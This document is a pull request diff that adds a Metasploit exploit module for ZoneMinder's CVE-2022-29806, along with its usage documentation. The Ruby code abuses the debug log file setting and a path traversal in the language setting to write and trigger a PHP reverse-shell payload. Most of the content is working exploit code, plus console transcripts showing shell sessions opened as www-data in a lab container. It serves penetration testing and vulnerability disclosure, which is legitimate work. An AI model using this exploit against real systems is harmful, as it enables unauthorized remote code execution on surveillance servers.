### PR TITLE
Add Zoneminder lang exec module

### DIFF
--- a/documentation/modules/exploit/unix/webapp/zoneminder_lang_exec.md
+++ b/documentation/modules/exploit/unix/webapp/zoneminder_lang_exec.md
@@ -40,9 +40,9 @@ To enable authentication for verification and scenarios, follow this steps:
 ## Verification Steps
 1. Do: `use exploit/unix/webapp/zoneminder_lang_exec`
 2. Do: `set RHOSTS [ips]`
-5. Do: `set LHOST [lhost]`
-6. Do: `run`
-7. You should get a shell.
+3. Do: `set LHOST [lhost]`
+4. Do: `run`
+5. You should get a shell.
 
 ## Options
 ### RPORT

--- a/documentation/modules/exploit/unix/webapp/zoneminder_lang_exec.md
+++ b/documentation/modules/exploit/unix/webapp/zoneminder_lang_exec.md
@@ -1,6 +1,6 @@
 ## Description
 
-This module exploits arbitrary file write in debug log file option chained with a path traversal in language settings that leads to a remote code execution in ZoneMinder surveillance software versions before 1.36.13 and before 1.37.11
+This module exploits an arbitrary file write chained with a path traversal in the debug log file option in language settings that leads to a remote code execution in ZoneMinder surveillance software versions before 1.36.13 and before 1.37.11
 
 More about the vulnerability detail: [CVE-2022-29806](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29806).
 
@@ -45,10 +45,6 @@ To enable authentication for verification and scenarios, follow this steps:
 5. You should get a shell.
 
 ## Options
-### RPORT
-The Zoneminder target port (default: 80)
-### TARGETURI
-The ZoneMinder path (default: `/zm/`)
 ### USERNAME
 The ZoneMinder username (default: admin)
 ### PASSWORD

--- a/documentation/modules/exploit/unix/webapp/zoneminder_lang_exec.md
+++ b/documentation/modules/exploit/unix/webapp/zoneminder_lang_exec.md
@@ -1,0 +1,124 @@
+## Description
+
+This module exploits arbitrary file write in debug log file option chained with a path traversal in language settings that leads to a remote code execution in ZoneMinder surveillance software versions before 1.36.13 and before 1.37.11
+
+More about the vulnerability detail: [CVE-2022-29806](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29806).
+
+The module will automatically use `php/reverse_perl` payload.
+
+The module will check if authentication is enabled but Zoneminder does not enable the authentication by default.
+
+## Vulnerable Application
+[Zoneminder](https://zoneminder.com/) is a free and open-source software defined telecommunications stack for real-time communication, WebRTC, telecommunications, video, and Voice over Internet Protocol.
+
+This module has been tested successfully on Zoneminder versions:
+* 1.36.4~64bit on Ubuntu 18.04
+* 1.34.23~64bit on Debian 11.10
+
+### Source and Installers
+* [Source Code Repository](https://github.com/ZoneMinder/zoneminder/)
+* [Installers](https://github.com/ZoneMinder/zoneminder/#installation-methods)
+* [Docker](https://github.com/ZoneMinder/zmdockerfiles)
+
+### Docker installation
+```
+docker run -d --rm -ti -p 1080:80 \
+    -e TZ='Europe/London' \
+    --shm-size="512m" \
+    --name zoneminder \
+    zoneminderhq/zoneminder:latest-ubuntu18.04
+```
+Navigate to [http:\//172.17.0.2/zm/index.php?view=privacy](http://172.17.0.2/zm/index.php?view=privacy) and click **APPLY** to activate the dashboard
+
+### Enable authentication
+To enable authentication for verification and scenarios, follow this steps:
+1. Navigate to [http:\//172.17.0.2/zm/index.php?view=options](http://172.17.0.2/zm/index.php?view=options)
+2. Tick the **OPT_USE_AUTH** option and click save
+3. Login with the default password `admin:admin`
+4. Navigate to [http:\//172.17.0.2/zm/index.php?view=options&tab=users](http://172.17.0.2/zm/index.php?view=options&tab=users) and change the admin password
+
+## Verification Steps
+1. Do: `use exploit/unix/webapp/zoneminder_lang_exec`
+2. Do: `set RHOSTS [ips]`
+5. Do: `set LHOST [lhost]`
+6. Do: `run`
+7. You should get a shell.
+
+## Options
+### RPORT
+The Zoneminder target port (default: 80)
+### TARGETURI
+The ZoneMinder path (default: `/zm/`)
+### USERNAME
+The ZoneMinder username (default: admin)
+### PASSWORD
+The ZoneMinder password (default: admin)
+
+## Scenarios
+### Successful exploitation of ZoneMinder 1.36.4 on Ubuntu 18.04 Docker
+```
+msf6 > use exploit/unix/webapp/zoneminder_lang_exec
+[*] Using configured payload php/reverse_perl
+msf6 exploit(unix/webapp/zoneminder_lang_exec) > set RHOSTS 172.17.0.2
+RHOSTS => 172.17.0.2
+msf6 exploit(unix/webapp/zoneminder_lang_exec) > set LHOST 172.17.0.1
+LHOST => 172.17.0.1
+msf6 exploit(unix/webapp/zoneminder_lang_exec) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(unix/webapp/zoneminder_lang_exec) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[+] Version Detected: 1.36.4
+[*] Leak installation directory path
+[+] Path: /usr/share/zoneminder/www
+[+] Shell: ../../../../../tmp/rmdQiqoLFCsov.php
+[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:58932) at 2022-04-27 03:36:31 +0700
+
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+```
+
+### Successful exploitation of ZoneMinder 1.36.4 on Ubuntu 18.04 Docker with authentication enabled
+```
+msf6 > use exploit/unix/webapp/zoneminder_lang_exec
+[*] Using configured payload php/reverse_perl
+msf6 exploit(unix/webapp/zoneminder_lang_exec) > set RHOSTS 172.17.0.2
+RHOSTS => 172.17.0.2
+msf6 exploit(unix/webapp/zoneminder_lang_exec) > set LHOST 172.17.0.1
+LHOST => 172.17.0.1
+msf6 exploit(unix/webapp/zoneminder_lang_exec) > set USERNAME admin
+USERNAME => admin
+msf6 exploit(unix/webapp/zoneminder_lang_exec) > set PASSWORD password
+PASSWORD => password
+msf6 exploit(unix/webapp/zoneminder_lang_exec) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(unix/webapp/zoneminder_lang_exec) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[+] Version Detected: 1.36.4
+[*] Leak installation directory path
+[+] Path: /usr/share/zoneminder/www
+[+] Shell: ../../../../../tmp/Cn3PqXcN9VlAR98.php
+[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:51944) at 2022-04-27 18:53:14 +0700
+
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+```
+
+### Failed exploitation due to invaild credentials
+```
+msf6 > use exploit/unix/webapp/zoneminder_lang_exec
+[*] Using configured payload php/reverse_perl
+msf6 exploit(unix/webapp/zoneminder_lang_exec) > set RHOSTS 172.17.0.2
+RHOSTS => 172.17.0.2
+msf6 exploit(unix/webapp/zoneminder_lang_exec) > set LHOST 172.17.0.1
+LHOST => 172.17.0.1
+msf6 exploit(unix/webapp/zoneminder_lang_exec) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(unix/webapp/zoneminder_lang_exec) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[-] Service found, but authentication failed
+[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable.
+[*] Exploit completed, but no session was created.
+```

--- a/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
+++ b/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
@@ -59,8 +59,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'uri' => normalize_uri(target_uri.path, '/index.php'),
         'method' => 'GET'
       )
-      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
-      fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200
+      return Exploit::CheckCode::Unknown('No response from the web service') if res.nil?
+      return Exploit::CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200
 
       username = datastore['USERNAME']
       password = datastore['PASSWORD']
@@ -73,39 +73,32 @@ class MetasploitModule < Msf::Exploit::Remote
           'uri' => normalize_uri(target_uri.path, '/index.php'),
           'data' => data.to_s
         })
-        if res.body =~ %r{<title>ZM - Login</title>}
-          vprint_error('Service found, but authentication failed')
-          return Exploit::CheckCode::Detected
-        else
-          res.get_cookies.match(/(ZMSESSID=\w+[^;])/)
-          @cookie = Regexp.last_match(1)
-          res = send_request_cgi(
-            'uri' => normalize_uri(target_uri.path, '/index.php'),
-            'method' => 'GET',
-            'cookie' => @cookie
-          )
-        end
+        return Exploit::CheckCode::Detected('Authentication failed') if res.body =~ %r{<title>ZM - Login</title>}
+
+        res.get_cookies.match(/(ZMSESSID=\w+[^;])/)
+        @cookie = Regexp.last_match(1)
+        res = send_request_cgi(
+          'uri' => normalize_uri(target_uri.path, '/index.php'),
+          'method' => 'GET',
+          'cookie' => @cookie
+        )
       end
 
       res.body.match(/v(1.\d+.\d+)/)
-      version = Regexp.last_match(1)
+      version = Rex::Version.new(Regexp.last_match(1))
 
-      if version && Rex::Version.new(version) <= Rex::Version.new('1.37.10')
-        @appears = Exploit::CheckCode::Appears
-        vprint_good("Version Detected: #{version}")
-        return @appears
-      end
+      return Exploit::CheckCode::Appears("Version Detected: #{version}") if version <= Rex::Version.new('1.37.10')
     rescue ::Rex::ConnectionError
-      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+      return Exploit::CheckCode::Unknown('Could not connect to the web service')
     end
-    vprint_bad("Version Detected: #{version}")
-    Exploit::CheckCode::Safe
+    Exploit::CheckCode::Safe("Version Detected: #{version}")
   end
 
   def exploit
-    @appears ||= check
-    unless Exploit::CheckCode::Appears == @appears
-      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    unless Exploit::CheckCode::Appears == check
+      fail_with(Failure::Unknown, check.reason) if check.code == 'unknown'
+      fail_with(Failure::NoAccess, check.reason) if check.code == 'detected'
+      fail_with(Failure::NotVulnerable, check.reason)
     end
 
     begin

--- a/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
+++ b/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
@@ -149,53 +149,63 @@ class MetasploitModule < Msf::Exploit::Remote
     shell = traverse_path + "tmp/#{fname}"
     data = "view=options&tab=logging&action=options&newConfig[ZM_LOG_DEBUG]=1&newConfig[ZM_LOG_DEBUG_FILE]=#{shell}"
     data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
-    send_request_cgi(
+    res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/index.php'),
       'data' => data.to_s,
       'keep_cookies' => true
     )
     vprint_good("Shell: #{shell}")
+    fail_with(Failure::UnexpectedReply, 'Unable to set LOG_DEBUG_FILE option') if res.nil? || res&.code != 302
 
     p = %(<?php #{payload.encoded} ?>)
     data = "view=request&request=log&task=create&level=ERR&message=#{p}&file=#{shell}"
     data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
-    send_request_cgi(
+    res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/index.php'),
       'data' => data.to_s,
       'keep_cookies' => true
     )
+    unless res['content-type'] == 'application/json'
+      fail_with(Failure::UnexpectedReply, 'Unable to get valid JSON response')
+    end
+    result = JSON.parse(res.body)['result']
+    fail_with(Failure::UnexpectedReply, 'Unable to write payload to LOG_DEBUG_FILE') if result != 'Ok'
 
     # trigger the shell
     lang = shell.gsub(/\.php/, '')
     data = "view=options&tab=system&action=options&newConfig[ZM_LANG_DEFAULT]=#{lang}"
     data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
-    send_request_cgi(
+    res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/index.php'),
       'data' => data.to_s,
       'keep_cookies' => true
     )
+    fail_with(Failure::UnexpectedReply, 'Unable to trigger the payload') if res.nil? || res&.code != 302
 
     # cleanup
     data = Rack::Utils.parse_nested_query(data)
     data['newConfig']['ZM_LANG_DEFAULT'] = current_lang
-    send_request_cgi(
+    res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/index.php'),
       'data' => data.to_query,
       'keep_cookies' => true
     )
+    vprint_warning('Unable to reset language to default') if res.nil? || res&.code != 200
+
     data['tab'] = 'logging'
     data['newConfig']['ZM_LOG_DEBUG'] = 0
     data['newConfig']['ZM_LOG_DEBUG_FILE'] = ''
-    send_request_cgi(
+    res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/index.php'),
       'data' => data.to_query,
       'keep_cookies' => true
     )
+    vprint_warning('Unable to reset debug option') if res.nil? || res&.code != 302
   rescue ::Rex::ConnectionError
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
   end

--- a/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
+++ b/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
@@ -124,6 +124,8 @@ class MetasploitModule < Msf::Exploit::Remote
     unless res['content-type'] == 'application/json'
       fail_with(Failure::UnexpectedReply, 'Unable to get valid JSON response')
     end
+    fail_with(Failure::UnexpectedReply, 'Unable to get valid JSON response') if res.nil? || res.body.blank?
+
     res.body.match(/(\{"result":.*})/)
     request_log = JSON.parse(Regexp.last_match(1)).with_indifferent_access
     if request_log.key?(:rows) # Check for latest version key first v1.36.x

--- a/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
+++ b/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
@@ -113,11 +113,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_get' => { 'view' => 'options' }
     )
     csrf_magic = get_csrf_magic(res)
-    fail_with(Failure::UnexpectedReply, 'Unable to get current language') if res.nil?
     current_lang = res.get_html_document.at(
       'select[@name="newConfig[ZM_LANG_DEFAULT]"]
         option[@selected="selected"]'
-    ).text
+    )&.text
+    fail_with(Failure::UnexpectedReply, 'Unable to get current language') if res.nil? || current_lang.nil?
 
     data = 'view=request&request=log&task=query&limit=10'
     data += "&__csrf_magic=#{csrf_magic}" if csrf_magic

--- a/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
+++ b/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
@@ -64,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
     password = datastore['PASSWORD']
     if res.body =~ /ZoneMinder Login/
       data = "action=login&view=login&username=#{username}&password=#{password}"
-      csrf_magic = get_csrf_magic(res.body)
+      csrf_magic = get_csrf_magic(res.get_html_document)
       data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
       res = send_request_cgi({
         'method' => 'POST',
@@ -115,7 +115,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'cookie' => @cookie,
       'vars_get' => { 'view' => 'options' }
     )
-    csrf_magic = get_csrf_magic(res.body)
+    csrf_magic = get_csrf_magic(res.get_html_document)
     current_lang = res.get_html_document.at(
       'select[@name="newConfig[ZM_LANG_DEFAULT]"]
         option[@selected="selected"]'
@@ -207,7 +207,6 @@ class MetasploitModule < Msf::Exploit::Remote
   private
 
   def get_csrf_magic(html_body)
-    html_body.match(/csrfMagicToken = "([^"]+)/)
-    Regexp.last_match(1)
+    html_body.at('//input[@name="__csrf_magic"]/@value')&.text
   end
 end

--- a/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
+++ b/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  prepend Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -71,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'uri' => normalize_uri(target_uri.path, '/index.php'),
         'data' => data.to_s
       })
-      return Exploit::CheckCode::Detected('Authentication failed') if res.body =~ %r{<title>ZM - Login</title>}
+      return Exploit::CheckCode::Safe('Authentication failed') if res.body =~ %r{<title>ZM - Login</title>}
 
       res.get_cookies.match(/(ZMSESSID=\w+[^;])/)
       @cookie = Regexp.last_match(1)
@@ -93,13 +94,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    @check ||= check
-    unless Exploit::CheckCode::Appears == @check
-      fail_with(Failure::Unknown, @check.reason) if @check.code == 'unknown'
-      fail_with(Failure::NoAccess, @check.reason) if @check.code == 'detected'
-      fail_with(Failure::NotVulnerable, @check.reason)
-    end
-
     vprint_status('Leak installation directory path')
     random_path = rand_text_alphanumeric(6..15)
     send_request_cgi(

--- a/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
+++ b/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
@@ -124,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Remote
     unless res['content-type'] == 'application/json'
       fail_with(Failure::UnexpectedReply, 'Unable to get valid JSON response')
     end
-    fail_with(Failure::UnexpectedReply, 'Unable to get valid JSON response') if res.nil? || res.body.blank?
+    fail_with(Failure::UnexpectedReply, 'Unable to get valid JSON response') if res.nil? || res&.body.blank?
 
     res.body.match(/(\{"result":.*})/)
     request_log = JSON.parse(Regexp.last_match(1)).with_indifferent_access

--- a/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
+++ b/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
@@ -61,9 +61,9 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Unknown('No response from the web service') if res.nil?
     return Exploit::CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200
 
-    if res.body =~ /ZoneMinder Login/
+    if res.body =~ /ZoneMinder/
       csrf_magic = get_csrf_magic(res)
-      res = authenticate(csrf_magic)
+      res = authenticate(csrf_magic) if res.body =~ /ZoneMinder Login/
       return Exploit::CheckCode::Safe('Authentication failed') if res.body =~ %r{<title>ZM - Login</title>}
 
       res = send_request_cgi(
@@ -71,10 +71,17 @@ class MetasploitModule < Msf::Exploit::Remote
         'method' => 'GET',
         'keep_cookies' => true
       )
+    else
+      return Exploit::CheckCode::Safe('Target is not a ZoneMinder web server')
     end
 
     res.body.match(/v(1.\d+.\d+)/)
-    version = Rex::Version.new(Regexp.last_match(1))
+    version = Regexp.last_match(1)
+    unless version
+      return Exploit::CheckCode::Safe('Unable to determine ZoneMinder version')
+    end
+
+    version = Rex::Version.new(version)
 
     return Exploit::CheckCode::Appears("Version Detected: #{version}") if version <= Rex::Version.new('1.37.10')
 
@@ -84,8 +91,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    cookie_jar.clear
     unless datastore['AutoCheck']
+      cookie_jar.clear
       res = authenticate
       fail_with(Failure::NoAccess, 'Authentication failed') if res&.body =~ %r{<title>ZM - Login</title>}
     end

--- a/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
+++ b/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
@@ -61,25 +61,15 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Unknown('No response from the web service') if res.nil?
     return Exploit::CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200
 
-    username = datastore['USERNAME']
-    password = datastore['PASSWORD']
     if res.body =~ /ZoneMinder Login/
-      data = "action=login&view=login&username=#{username}&password=#{password}"
-      csrf_magic = get_csrf_magic(res.get_html_document)
-      data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
-      res = send_request_cgi({
-        'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path, '/index.php'),
-        'data' => data.to_s
-      })
+      csrf_magic = get_csrf_magic(res)
+      res = authenticate(csrf_magic)
       return Exploit::CheckCode::Safe('Authentication failed') if res.body =~ %r{<title>ZM - Login</title>}
 
-      res.get_cookies.match(/(ZMSESSID=\w+[^;])/)
-      @cookie = Regexp.last_match(1)
       res = send_request_cgi(
         'uri' => normalize_uri(target_uri.path, '/index.php'),
         'method' => 'GET',
-        'cookie' => @cookie
+        'keep_cookies' => true
       )
     end
 
@@ -94,22 +84,29 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    cookie_jar.clear
+    unless datastore['AutoCheck']
+      res = authenticate
+      fail_with(Failure::NoAccess, 'Authentication failed') if res&.body =~ %r{<title>ZM - Login</title>}
+    end
+
     vprint_status('Leak installation directory path')
     random_path = rand_text_alphanumeric(6..15)
     send_request_cgi(
       'uri' => normalize_uri(target_uri.path, '/index.php'),
       'method' => 'GET',
-      'cookie' => @cookie,
+      'keep_cookies' => true,
       'vars_get' => { 'view' => random_path }
     )
 
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, '/index.php'),
       'method' => 'GET',
-      'cookie' => @cookie,
+      'keep_cookies' => true,
       'vars_get' => { 'view' => 'options' }
     )
-    csrf_magic = get_csrf_magic(res.get_html_document)
+    csrf_magic = get_csrf_magic(res)
+    fail_with(Failure::UnexpectedReply, 'Unable to get current language') if res.nil?
     current_lang = res.get_html_document.at(
       'select[@name="newConfig[ZM_LANG_DEFAULT]"]
         option[@selected="selected"]'
@@ -121,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/index.php'),
       'data' => data.to_s,
-      'cookie' => @cookie
+      'keep_cookies' => true
     )
 
     res.body.match(/(\{"result":.*})/)
@@ -151,7 +148,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/index.php'),
       'data' => data.to_s,
-      'cookie' => @cookie
+      'keep_cookies' => true
     )
     vprint_good("Shell: #{shell}")
 
@@ -162,7 +159,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/index.php'),
       'data' => data.to_s,
-      'cookie' => @cookie
+      'keep_cookies' => true
     )
 
     # trigger the shell
@@ -173,7 +170,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/index.php'),
       'data' => data.to_s,
-      'cookie' => @cookie
+      'keep_cookies' => true
     )
 
     # cleanup
@@ -183,7 +180,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/index.php'),
       'data' => data.to_query,
-      'cookie' => @cookie
+      'keep_cookies' => true
     )
     data['tab'] = 'logging'
     data['newConfig']['ZM_LOG_DEBUG'] = 0
@@ -192,7 +189,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/index.php'),
       'data' => data.to_query,
-      'cookie' => @cookie
+      'keep_cookies' => true
     )
   rescue ::Rex::ConnectionError
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
@@ -200,7 +197,22 @@ class MetasploitModule < Msf::Exploit::Remote
 
   private
 
-  def get_csrf_magic(html_body)
-    html_body.at('//input[@name="__csrf_magic"]/@value')&.text
+  def get_csrf_magic(res)
+    return if res.nil?
+
+    res.get_html_document.at('//input[@name="__csrf_magic"]/@value')&.text
+  end
+
+  def authenticate(csrf_magic = nil)
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+    data = "action=login&view=login&username=#{username}&password=#{password}"
+    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'data' => data.to_s,
+      'keep_cookies' => true
+    })
   end
 end

--- a/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
+++ b/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
@@ -53,44 +53,43 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    begin
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'method' => 'GET'
+    )
+    return Exploit::CheckCode::Unknown('No response from the web service') if res.nil?
+    return Exploit::CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200
+
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+    if res.body =~ /ZoneMinder Login/
+      data = "action=login&view=login&username=#{username}&password=#{password}"
+      csrf_magic = get_csrf_magic(res.body)
+      data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, '/index.php'),
+        'data' => data.to_s
+      })
+      return Exploit::CheckCode::Detected('Authentication failed') if res.body =~ %r{<title>ZM - Login</title>}
+
+      res.get_cookies.match(/(ZMSESSID=\w+[^;])/)
+      @cookie = Regexp.last_match(1)
       res = send_request_cgi(
         'uri' => normalize_uri(target_uri.path, '/index.php'),
-        'method' => 'GET'
+        'method' => 'GET',
+        'cookie' => @cookie
       )
-      return Exploit::CheckCode::Unknown('No response from the web service') if res.nil?
-      return Exploit::CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200
-
-      username = datastore['USERNAME']
-      password = datastore['PASSWORD']
-      if res.body =~ /ZoneMinder Login/
-        data = "action=login&view=login&username=#{username}&password=#{password}"
-        csrf_magic = get_csrf_magic(res.body)
-        data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
-        res = send_request_cgi({
-          'method' => 'POST',
-          'uri' => normalize_uri(target_uri.path, '/index.php'),
-          'data' => data.to_s
-        })
-        return Exploit::CheckCode::Detected('Authentication failed') if res.body =~ %r{<title>ZM - Login</title>}
-
-        res.get_cookies.match(/(ZMSESSID=\w+[^;])/)
-        @cookie = Regexp.last_match(1)
-        res = send_request_cgi(
-          'uri' => normalize_uri(target_uri.path, '/index.php'),
-          'method' => 'GET',
-          'cookie' => @cookie
-        )
-      end
-
-      res.body.match(/v(1.\d+.\d+)/)
-      version = Rex::Version.new(Regexp.last_match(1))
-
-      return Exploit::CheckCode::Appears("Version Detected: #{version}") if version <= Rex::Version.new('1.37.10')
-    rescue ::Rex::ConnectionError
-      return Exploit::CheckCode::Unknown('Could not connect to the web service')
     end
+
+    res.body.match(/v(1.\d+.\d+)/)
+    version = Rex::Version.new(Regexp.last_match(1))
+
+    return Exploit::CheckCode::Appears("Version Detected: #{version}") if version <= Rex::Version.new('1.37.10')
+
     Exploit::CheckCode::Safe("Version Detected: #{version}")
+  rescue ::Rex::ConnectionError
+    return Exploit::CheckCode::Unknown('Could not connect to the web service')
   end
 
   def exploit

--- a/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
+++ b/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
@@ -121,9 +121,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'keep_cookies' => true
     )
 
-    unless res['content-type'] == 'application/json'
-      fail_with(Failure::UnexpectedReply, 'Unable to get valid JSON response')
-    end
     fail_with(Failure::UnexpectedReply, 'Unable to get valid JSON response') if res.nil? || res&.body.blank?
 
     res.body.match(/(\{"result":.*})/)
@@ -167,9 +164,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => data.to_s,
       'keep_cookies' => true
     )
-    unless res['content-type'] == 'application/json'
-      fail_with(Failure::UnexpectedReply, 'Unable to get valid JSON response')
-    end
     result = JSON.parse(res.body)['result']
     fail_with(Failure::UnexpectedReply, 'Unable to write payload to LOG_DEBUG_FILE') if result != 'Ok'
 

--- a/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
+++ b/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
@@ -134,8 +134,7 @@ class MetasploitModule < Msf::Exploit::Remote
       elsif request_log.key?(:logs)
         request_log_key = 'logs'
       else
-        vprint_error("Service found, but can't find request log key")
-        return Exploit::CheckCode::Detected
+        fail_with(Failure::UnexpectedReply, 'Service found, but unable to find request log key')
       end
 
       request_log = request_log[request_log_key].select { |e| e['Message'] =~ /'#{random_path}'/ }.first
@@ -143,11 +142,10 @@ class MetasploitModule < Msf::Exploit::Remote
         path = request_log['File'].split('/')[0..-2].join('/')
         vprint_good("Path: #{path}")
       else
-        vprint_error("Service found, but can't leak installation directory path")
-        return Exploit::CheckCode::Detected
+        fail_with(Failure::UnexpectedReply, 'Service found, but unable to leak installation directory path')
       end
 
-      fname = "#{rand_text_alphanumeric(rand(6..15))}.php"
+      fname = "#{rand_text_alphanumeric(6..15)}.php"
       traverse_path = "#{path}/lang".split('/')[1..].map { '../' }.join
       shell = traverse_path + "tmp/#{fname}"
       data = "view=options&tab=logging&action=options&newConfig[ZM_LOG_DEBUG]=1&newConfig[ZM_LOG_DEBUG_FILE]=#{shell}"

--- a/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
+++ b/modules/exploits/unix/webapp/zoneminder_lang_exec.rb
@@ -1,0 +1,220 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ZoneMinder Language Settings Remote Code Execution',
+        'Description' => %q{
+          This module exploits arbitrary file write in debug log file option
+          chained with a path traversal in language settings that leads to a
+          remote code execution in ZoneMinder surveillance software versions
+          before 1.36.13 and before 1.37.11
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'krastanoel' ], # Discovery and exploit
+        'References' => [
+          [ 'CVE', '2022-29806' ],
+          [ 'URL', 'https://krastanoel.com/cve/2022-29806']
+        ],
+        'Platform' => ['php'],
+        'Privileged' => false,
+        'Arch' => ARCH_PHP,
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DisclosureDate' => '2022-04-27',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'Payload' => 'php/reverse_perl',
+          'Encoder' => 'php/base64'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(80),
+      OptString.new('USERNAME', [true, 'The ZoneMinder username', 'admin']),
+      OptString.new('PASSWORD', [true, 'The ZoneMinder password', 'admin']),
+      OptString.new('TARGETURI', [true, 'The ZoneMinder path', '/zm/'])
+    ])
+  end
+
+  def check
+    begin
+      res = send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, '/index.php'),
